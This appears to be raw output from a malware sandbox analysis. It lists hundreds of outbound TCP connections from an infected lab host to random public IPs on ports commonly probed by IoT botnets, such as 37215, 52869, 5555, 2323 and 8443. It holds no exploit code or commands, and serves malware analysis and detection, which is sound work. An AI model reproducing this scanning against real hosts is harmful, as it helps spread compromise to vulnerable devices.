                Source: global trafficTCP traffic: 192.168.2.20:45520 -> 139.220.80.168:37215
                Source: global trafficTCP traffic: 192.168.2.20:53474 -> 1.30.247.172:37215
                Source: global trafficTCP traffic: 192.168.2.20:37520 -> 164.37.235.78:81
                Source: global trafficTCP traffic: 192.168.2.20:52784 -> 21.186.78.77:7574
                Source: global trafficTCP traffic: 192.168.2.20:60302 -> 120.211.21.195:8080
                Source: global trafficTCP traffic: 192.168.2.20:58960 -> 59.213.176.162:8080
                Source: global trafficTCP traffic: 192.168.2.20:41990 -> 85.191.228.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:56656 -> 24.178.198.80:7574
                Source: global trafficTCP traffic: 192.168.2.20:40148 -> 121.189.109.57:52869
                Source: global trafficTCP traffic: 192.168.2.20:59514 -> 130.214.58.192:5555
                Source: global trafficTCP traffic: 192.168.2.20:59886 -> 199.4.48.239:8080
                Source: global trafficTCP traffic: 192.168.2.20:37810 -> 214.108.114.69:52869
                Source: global trafficTCP traffic: 192.168.2.20:56312 -> 211.86.78.89:8443
                Source: global trafficTCP traffic: 192.168.2.20:53826 -> 168.246.111.26:37215
                Source: global trafficTCP traffic: 192.168.2.20:58696 -> 151.76.245.168:8080
                Source: global trafficTCP traffic: 192.168.2.20:34400 -> 183.132.135.144:49152
                Source: global trafficTCP traffic: 192.168.2.20:34810 -> 39.174.77.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:33672 -> 110.112.123.163:81
                Source: global trafficTCP traffic: 192.168.2.20:44618 -> 126.158.169.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:52548 -> 43.143.2.136:49152
                Source: global trafficTCP traffic: 192.168.2.20:60356 -> 108.73.168.86:37215
                Source: global trafficTCP traffic: 192.168.2.20:58720 -> 20.153.133.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:43074 -> 108.86.208.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:49612 -> 201.141.203.203:5555
                Source: global trafficTCP traffic: 192.168.2.20:40250 -> 37.83.141.67:8443
                Source: global trafficTCP traffic: 192.168.2.20:36410 -> 93.254.188.46:8080
                Source: global trafficTCP traffic: 192.168.2.20:38756 -> 182.107.20.15:5555
                Source: global trafficTCP traffic: 192.168.2.20:33700 -> 36.78.245.121:8443
                Source: global trafficTCP traffic: 192.168.2.20:47664 -> 143.210.194.129:5555
                Source: global trafficTCP traffic: 192.168.2.20:38780 -> 146.149.143.40:37215
                Source: global trafficTCP traffic: 192.168.2.20:42408 -> 88.225.182.172:37215
                Source: global trafficTCP traffic: 192.168.2.20:58168 -> 165.149.217.240:8080
                Source: global trafficTCP traffic: 192.168.2.20:57044 -> 122.246.229.135:52869
                Source: global trafficTCP traffic: 192.168.2.20:38482 -> 40.151.66.173:8080
                Source: global trafficTCP traffic: 192.168.2.20:38784 -> 109.196.110.179:49152
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 25.220.37.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:46290 -> 11.229.75.234:49152
                Source: global trafficTCP traffic: 192.168.2.20:60136 -> 47.231.230.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:38042 -> 36.77.151.76:49152
                Source: global trafficTCP traffic: 192.168.2.20:51616 -> 49.1.7.205:52869
                Source: global trafficTCP traffic: 192.168.2.20:57454 -> 34.238.197.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:53350 -> 203.176.16.105:8080
                Source: global trafficTCP traffic: 192.168.2.20:39722 -> 14.73.117.144:52869
                Source: global trafficTCP traffic: 192.168.2.20:40782 -> 170.151.103.184:7574
                Source: global trafficTCP traffic: 192.168.2.20:48258 -> 76.34.194.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:59688 -> 16.65.75.160:52869
                Source: global trafficTCP traffic: 192.168.2.20:49042 -> 195.28.214.1:5555
                Source: global trafficTCP traffic: 192.168.2.20:47200 -> 81.85.194.30:8080
                Source: global trafficTCP traffic: 192.168.2.20:56756 -> 86.150.240.234:37215
                Source: global trafficTCP traffic: 192.168.2.20:35898 -> 95.101.120.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:48694 -> 83.81.254.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:45612 -> 60.86.119.144:81
                Source: global trafficTCP traffic: 192.168.2.20:35764 -> 186.119.243.90:49152
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 27.33.40.40:8443
                Source: global trafficTCP traffic: 192.168.2.20:35544 -> 126.61.58.229:37215
                Source: global trafficTCP traffic: 192.168.2.20:33802 -> 200.240.85.208:52869
                Source: global trafficTCP traffic: 192.168.2.20:57480 -> 175.192.25.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:42410 -> 197.44.113.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:43818 -> 191.184.16.254:8080
                Source: global trafficTCP traffic: 192.168.2.20:60776 -> 68.82.30.86:8443
                Source: global trafficTCP traffic: 192.168.2.20:41850 -> 17.74.78.16:8080
                Source: global trafficTCP traffic: 192.168.2.20:57370 -> 19.227.52.166:8443
                Source: global trafficTCP traffic: 192.168.2.20:52122 -> 202.34.135.27:7574
                Source: global trafficTCP traffic: 192.168.2.20:43226 -> 198.50.156.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:53640 -> 123.237.248.195:52869
                Source: global trafficTCP traffic: 192.168.2.20:45910 -> 95.98.64.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:58966 -> 49.245.175.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51354 -> 29.202.233.5:37215
                Source: global trafficTCP traffic: 192.168.2.20:60896 -> 92.186.8.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:41414 -> 135.228.46.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:40950 -> 174.252.187.249:37215
                Source: global trafficTCP traffic: 192.168.2.20:41290 -> 89.4.36.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 149.42.172.25:7574
                Source: global trafficTCP traffic: 192.168.2.20:35888 -> 137.197.44.71:8443
                Source: global trafficTCP traffic: 192.168.2.20:56664 -> 197.181.82.192:52869
                Source: global trafficTCP traffic: 192.168.2.20:57416 -> 174.135.4.19:8080
                Source: global trafficTCP traffic: 192.168.2.20:51356 -> 199.164.2.226:5555
                Source: global trafficTCP traffic: 192.168.2.20:58378 -> 39.8.92.226:8080
                Source: global trafficTCP traffic: 192.168.2.20:35422 -> 222.8.146.13:8443
                Source: global trafficTCP traffic: 192.168.2.20:36822 -> 141.145.10.198:49152
                Source: global trafficTCP traffic: 192.168.2.20:33320 -> 108.77.7.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:33196 -> 16.146.174.98:5555
                Source: global trafficTCP traffic: 192.168.2.20:43882 -> 38.150.249.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:42304 -> 93.175.160.79:52869
                Source: global trafficTCP traffic: 192.168.2.20:42934 -> 179.196.98.226:7574
                Source: global trafficTCP traffic: 192.168.2.20:48398 -> 105.158.147.174:81
                Source: global trafficTCP traffic: 192.168.2.20:39078 -> 149.189.159.233:37215
                Source: global trafficTCP traffic: 192.168.2.20:51686 -> 62.107.94.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:57748 -> 74.208.118.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:56716 -> 182.104.216.147:52869
                Source: global trafficTCP traffic: 192.168.2.20:34106 -> 187.16.231.32:37215
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 182.157.115.73:49152
                Source: global trafficTCP traffic: 192.168.2.20:50148 -> 186.67.89.101:8080
                Source: global trafficTCP traffic: 192.168.2.20:53370 -> 129.126.74.71:81
                Source: global trafficTCP traffic: 192.168.2.20:46502 -> 36.138.107.187:49152
                Source: global trafficTCP traffic: 192.168.2.20:38782 -> 159.223.77.33:7574
                Source: global trafficTCP traffic: 192.168.2.20:59708 -> 96.210.216.56:8443
                Source: global trafficTCP traffic: 192.168.2.20:54996 -> 101.164.76.184:52869
                Source: global trafficTCP traffic: 192.168.2.20:48852 -> 80.245.214.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:47984 -> 184.106.84.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 111.94.109.213:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 27.245.148.122:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.168.246.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 4.29.56.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 38.107.4.6:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.104.95.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.225.32.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 115.172.34.22:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 165.24.244.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.54.63.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 91.89.192.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 123.150.242.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 156.56.38.42:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.28.155.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 188.214.50.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 122.55.125.10:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 198.150.168.4:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 14.109.51.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 100.177.221.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 139.152.15.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.161.81.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 13.63.61.154:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.220.228.131:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 93.29.142.216:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 176.45.32.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 124.37.144.160:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.138.123.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 154.144.107.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 85.93.120.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 83.206.191.47:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 59.141.175.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 170.104.98.24:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 61.90.94.67:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 194.225.68.79:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 24.105.116.75:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 89.162.4.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.116.155.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.213.151.13:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 121.175.138.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 195.28.143.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.111.127.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 32.237.238.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 54.121.138.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 186.206.2.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 125.45.118.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 147.237.210.54:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.98.141.9:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 2.69.114.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 8.78.234.102:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 76.102.146.7:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.225.215.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 46.166.183.35:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.226.140.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 179.1.27.195:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 178.103.96.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 209.50.36.159:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.77.125.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 203.140.50.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 36.107.62.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 167.143.118.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 81.90.71.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 114.149.31.119:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 45.18.116.249:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.170.168.4:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.44.30.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 73.168.135.102:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 62.29.193.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 105.88.240.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.188.38.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 219.92.27.198:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 120.99.119.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.201.181.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.196.60.220:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 220.1.153.205:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 133.67.141.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.164.249.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 135.132.147.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 39.82.50.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 113.104.218.82:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 171.160.36.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 19.191.96.74:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.237.149.185:2323
                Source: global trafficTCP traffic: 192.168.2.20:51666 -> 48.38.228.119:37215
                Source: global trafficTCP traffic: 192.168.2.20:55084 -> 171.80.64.115:7574
                Source: global trafficTCP traffic: 192.168.2.20:37922 -> 47.112.175.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:39908 -> 44.103.97.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:55610 -> 180.157.38.69:7574
                Source: global trafficTCP traffic: 192.168.2.20:50832 -> 67.224.83.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:56492 -> 23.11.95.110:37215
                Source: global trafficTCP traffic: 192.168.2.20:50150 -> 42.186.87.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:53732 -> 123.41.22.146:5555
                Source: global trafficTCP traffic: 192.168.2.20:43170 -> 206.113.172.55:5555
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 11.161.130.93:7574
                Source: global trafficTCP traffic: 192.168.2.20:55592 -> 197.241.111.186:7574
                Source: global trafficTCP traffic: 192.168.2.20:43670 -> 17.171.21.221:81
                Source: global trafficTCP traffic: 192.168.2.20:56286 -> 49.162.158.92:7574
                Source: global trafficTCP traffic: 192.168.2.20:44560 -> 58.83.78.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:56802 -> 211.10.41.156:37215
                Source: global trafficTCP traffic: 192.168.2.20:60784 -> 163.5.97.251:81
                Source: global trafficTCP traffic: 192.168.2.20:56348 -> 202.51.68.65:52869
                Source: global trafficTCP traffic: 192.168.2.20:43936 -> 132.125.134.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:33974 -> 125.233.81.181:5555
                Source: global trafficTCP traffic: 192.168.2.20:49644 -> 219.72.130.131:52869
                Source: global trafficTCP traffic: 192.168.2.20:45920 -> 72.48.87.170:81
                Source: global trafficTCP traffic: 192.168.2.20:54482 -> 156.203.51.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:38870 -> 222.89.163.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:54236 -> 67.154.29.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:45226 -> 28.24.68.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:54834 -> 146.106.79.93:49152
                Source: global trafficTCP traffic: 192.168.2.20:34598 -> 129.65.108.24:5555
                Source: global trafficTCP traffic: 192.168.2.20:34120 -> 49.183.251.35:8443
                Source: global trafficTCP traffic: 192.168.2.20:56828 -> 14.131.47.227:52869
                Source: global trafficTCP traffic: 192.168.2.20:56514 -> 154.247.85.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:33082 -> 190.231.42.136:37215
                Source: global trafficTCP traffic: 192.168.2.20:47700 -> 115.18.168.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:38916 -> 71.251.113.238:5555
                Source: global trafficTCP traffic: 192.168.2.20:58026 -> 193.226.141.130:81
                Source: global trafficTCP traffic: 192.168.2.20:50436 -> 152.26.85.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:57174 -> 159.193.139.173:81
                Source: global trafficTCP traffic: 192.168.2.20:57306 -> 40.43.172.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:40524 -> 203.155.149.72:81
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 5.147.60.12:37215
                Source: global trafficTCP traffic: 192.168.2.20:55674 -> 140.23.32.247:8443
                Source: global trafficTCP traffic: 192.168.2.20:38606 -> 117.167.92.191:52869
                Source: global trafficTCP traffic: 192.168.2.20:35006 -> 124.55.234.220:81
                Source: global trafficTCP traffic: 192.168.2.20:59668 -> 74.232.137.164:5555
                Source: global trafficTCP traffic: 192.168.2.20:50708 -> 207.102.60.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51106 -> 46.222.134.3:8080
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 51.123.219.80:8443
                Source: global trafficTCP traffic: 192.168.2.20:35768 -> 1.210.9.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:52016 -> 154.57.218.161:49152
                Source: global trafficTCP traffic: 192.168.2.20:42950 -> 37.111.156.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:45136 -> 122.228.67.222:49152
                Source: global trafficTCP traffic: 192.168.2.20:60528 -> 122.243.131.89:7574
                Source: global trafficTCP traffic: 192.168.2.20:48566 -> 210.116.241.219:5555
                Source: global trafficTCP traffic: 192.168.2.20:43386 -> 11.226.128.181:8080
                Source: global trafficTCP traffic: 192.168.2.20:60056 -> 217.125.147.200:5555
                Source: global trafficTCP traffic: 192.168.2.20:40164 -> 220.131.225.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:46268 -> 55.187.88.64:8080
                Source: global trafficTCP traffic: 192.168.2.20:40716 -> 163.36.51.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:54422 -> 64.42.1.11:81
                Source: global trafficTCP traffic: 192.168.2.20:54210 -> 206.117.114.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:44944 -> 222.133.41.233:5555
                Source: global trafficTCP traffic: 192.168.2.20:34578 -> 99.155.210.76:8443
                Source: global trafficTCP traffic: 192.168.2.20:45528 -> 84.78.78.130:8080
                Source: global trafficTCP traffic: 192.168.2.20:57140 -> 114.194.154.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:59960 -> 118.126.149.210:81
                Source: global trafficTCP traffic: 192.168.2.20:37068 -> 102.245.187.124:8080
                Source: global trafficTCP traffic: 192.168.2.20:48564 -> 178.227.209.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:35660 -> 89.89.254.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:40876 -> 161.117.155.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:35122 -> 47.125.48.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:43976 -> 215.181.140.3:81
                Source: global trafficTCP traffic: 192.168.2.20:53318 -> 166.221.246.62:7574
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 1.21.220.147:8443
                Source: global trafficTCP traffic: 192.168.2.20:44516 -> 215.199.64.119:8080
                Source: global trafficTCP traffic: 192.168.2.20:34308 -> 213.35.187.150:7574
                Source: global trafficTCP traffic: 192.168.2.20:45786 -> 205.13.133.200:81
                Source: global trafficTCP traffic: 192.168.2.20:51100 -> 191.252.54.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:47264 -> 174.166.72.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:55356 -> 89.18.94.49:52869
                Source: global trafficTCP traffic: 192.168.2.20:41066 -> 66.220.233.134:8443
                Source: global trafficTCP traffic: 192.168.2.20:50846 -> 208.243.26.125:5555
                Source: global trafficTCP traffic: 192.168.2.20:33342 -> 95.80.182.34:8443
                Source: global trafficTCP traffic: 192.168.2.20:48468 -> 129.9.82.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:34874 -> 126.12.240.246:81
                Source: global trafficTCP traffic: 192.168.2.20:49698 -> 41.9.236.30:37215
                Source: global trafficTCP traffic: 192.168.2.20:44546 -> 115.114.122.15:52869
                Source: global trafficTCP traffic: 192.168.2.20:52378 -> 55.59.39.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:41488 -> 216.211.142.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:58570 -> 64.104.185.88:5555
                Source: global trafficTCP traffic: 192.168.2.20:49562 -> 65.99.212.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:32920 -> 209.34.156.41:8080
                Source: global trafficTCP traffic: 192.168.2.20:38992 -> 190.21.153.214:7574
                Source: global trafficTCP traffic: 192.168.2.20:39230 -> 58.205.220.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:51852 -> 125.120.31.95:7574
                Source: global trafficTCP traffic: 192.168.2.20:56814 -> 41.244.197.101:8443
                Source: global trafficTCP traffic: 192.168.2.20:43750 -> 138.208.123.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:51466 -> 183.51.240.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:42914 -> 35.244.23.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:54738 -> 130.52.53.47:81
                Source: global trafficTCP traffic: 192.168.2.20:56558 -> 220.221.221.108:8080
                Source: global trafficTCP traffic: 192.168.2.20:54948 -> 152.90.233.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:55164 -> 27.169.136.209:49152
                Source: global trafficTCP traffic: 192.168.2.20:38372 -> 40.99.150.234:8443
                Source: global trafficTCP traffic: 192.168.2.20:49502 -> 74.96.156.31:81
                Source: global trafficTCP traffic: 192.168.2.20:47774 -> 193.51.46.187:81
                Source: global trafficTCP traffic: 192.168.2.20:44296 -> 216.109.183.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:47590 -> 126.191.100.107:49152
                Source: global trafficTCP traffic: 192.168.2.20:47550 -> 125.153.37.11:5555
                Source: global trafficTCP traffic: 192.168.2.20:39112 -> 114.132.33.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:60534 -> 155.0.76.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:46608 -> 188.115.113.70:5555
                Source: global trafficTCP traffic: 192.168.2.20:43454 -> 79.231.62.91:49152
                Source: global trafficTCP traffic: 192.168.2.20:44782 -> 136.133.36.86:5555
                Source: global trafficTCP traffic: 192.168.2.20:59126 -> 51.188.61.166:8080
                Source: global trafficTCP traffic: 192.168.2.20:35234 -> 12.4.137.28:8443
                Source: global trafficTCP traffic: 192.168.2.20:35780 -> 208.226.139.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:60242 -> 71.129.56.39:52869
                Source: global trafficTCP traffic: 192.168.2.20:49370 -> 82.33.25.142:8443
                Source: global trafficTCP traffic: 192.168.2.20:40060 -> 99.7.230.121:81
                Source: global trafficTCP traffic: 192.168.2.20:53220 -> 87.236.72.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:55288 -> 106.165.30.99:5555
                Source: global trafficTCP traffic: 192.168.2.20:60864 -> 164.83.153.43:52869
                Source: global trafficTCP traffic: 192.168.2.20:45296 -> 89.28.59.57:49152
                Source: global trafficTCP traffic: 192.168.2.20:51774 -> 133.89.144.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:40538 -> 136.86.4.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:46918 -> 148.33.215.101:52869
                Source: global trafficTCP traffic: 192.168.2.20:55352 -> 187.248.127.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:56308 -> 60.81.104.12:49152
                Source: global trafficTCP traffic: 192.168.2.20:34138 -> 36.120.123.216:52869
                Source: global trafficTCP traffic: 192.168.2.20:52034 -> 216.189.38.126:5555
                Source: global trafficTCP traffic: 192.168.2.20:60450 -> 122.16.34.10:81
                Source: global trafficTCP traffic: 192.168.2.20:34828 -> 69.108.163.108:49152
                Source: global trafficTCP traffic: 192.168.2.20:56598 -> 147.121.39.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:35588 -> 219.217.46.6:81
                Source: global trafficTCP traffic: 192.168.2.20:60950 -> 121.89.157.177:52869
                Source: global trafficTCP traffic: 192.168.2.20:60216 -> 200.177.82.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:54950 -> 95.145.77.101:5555
                Source: global trafficTCP traffic: 192.168.2.20:40288 -> 47.59.64.91:81
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 75.154.37.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:44980 -> 119.192.203.59:5555
                Source: global trafficTCP traffic: 192.168.2.20:47606 -> 146.33.219.4:7574
                Source: global trafficTCP traffic: 192.168.2.20:54352 -> 75.178.23.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:47506 -> 45.1.148.196:5555
                Source: global trafficTCP traffic: 192.168.2.20:60564 -> 157.48.19.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:35052 -> 68.116.62.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:32946 -> 33.11.4.154:8443
                Source: global trafficTCP traffic: 192.168.2.20:49746 -> 194.176.233.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:46522 -> 178.221.126.119:7574
                Source: global trafficTCP traffic: 192.168.2.20:55064 -> 38.116.11.222:37215
                Source: global trafficTCP traffic: 192.168.2.20:39102 -> 179.128.137.93:5555
                Source: global trafficTCP traffic: 192.168.2.20:52894 -> 6.36.182.64:81
                Source: global trafficTCP traffic: 192.168.2.20:46148 -> 151.29.44.170:8443
                Source: global trafficTCP traffic: 192.168.2.20:42380 -> 162.53.49.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:45344 -> 168.119.247.129:7574
                Source: global trafficTCP traffic: 192.168.2.20:43220 -> 136.79.119.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:39634 -> 60.229.225.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:45634 -> 58.167.45.11:52869
                Source: global trafficTCP traffic: 192.168.2.20:38652 -> 61.40.32.6:7574
                Source: global trafficTCP traffic: 192.168.2.20:43210 -> 6.51.176.149:8443
                Source: global trafficTCP traffic: 192.168.2.20:44510 -> 178.99.201.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 129.212.171.46:5555
                Source: global trafficTCP traffic: 192.168.2.20:40684 -> 111.14.162.42:37215
                Source: global trafficTCP traffic: 192.168.2.20:41314 -> 138.193.244.97:52869
                Source: global trafficTCP traffic: 192.168.2.20:35440 -> 106.231.94.244:37215
                Source: global trafficTCP traffic: 192.168.2.20:57628 -> 94.140.74.218:49152
                Source: global trafficTCP traffic: 192.168.2.20:49032 -> 24.202.186.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:39754 -> 77.85.128.99:8443
                Source: global trafficTCP traffic: 192.168.2.20:57408 -> 209.109.213.167:8080
                Source: global trafficTCP traffic: 192.168.2.20:58972 -> 68.85.90.202:8080
                Source: global trafficTCP traffic: 192.168.2.20:41654 -> 116.181.231.91:52869
                Source: global trafficTCP traffic: 192.168.2.20:38768 -> 59.111.64.242:8080
                Source: global trafficTCP traffic: 192.168.2.20:57134 -> 189.183.63.36:8443
                Source: global trafficTCP traffic: 192.168.2.20:48826 -> 222.140.49.50:8443
                Source: global trafficTCP traffic: 192.168.2.20:52674 -> 209.218.138.94:52869
                Source: global trafficTCP traffic: 192.168.2.20:54540 -> 112.83.20.39:8443
                Source: global trafficTCP traffic: 192.168.2.20:50002 -> 56.168.205.50:7574
                Source: global trafficTCP traffic: 192.168.2.20:57036 -> 190.88.215.104:7574
                Source: global trafficTCP traffic: 192.168.2.20:44032 -> 58.245.130.186:37215
                Source: global trafficTCP traffic: 192.168.2.20:36818 -> 39.188.36.44:8443
                Source: global trafficTCP traffic: 192.168.2.20:58104 -> 27.217.196.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:45748 -> 66.186.206.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:55896 -> 169.128.156.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:53628 -> 221.82.173.164:52869
                Source: global trafficTCP traffic: 192.168.2.20:37608 -> 138.84.230.69:37215
